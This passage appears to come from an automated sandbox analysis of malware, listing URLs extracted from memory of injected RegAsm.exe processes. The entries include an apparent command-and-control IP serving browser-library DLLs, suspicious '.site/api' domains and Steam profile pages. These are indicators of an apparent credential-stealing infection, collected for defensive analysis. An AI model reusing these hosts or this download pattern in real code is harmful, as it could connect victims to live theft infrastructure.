                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/IDAKJD
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/W
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/date
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/datetii
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/e
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dllT
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/fsetsP
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/gManE
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/hl
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/iles
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dllk
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/q
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/s
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dllC
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dllU
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sp
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                            Source: RegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dllB
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/uinP
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll?
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/z
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9EBAAKF
                            Source: RegAsm.exe, 00000014.00000002.3179432809.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9GDBKJD
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9JJKFHCFB--
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9KFHDAA
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9pData
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9s.exe
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/api
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/apiJ
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/?format=json
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/?format=jsonSf=
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/?format=jsonZ
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org:443/?format=json
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chorusarorp.site/api
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akama
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                            Source: RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                            Source: RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
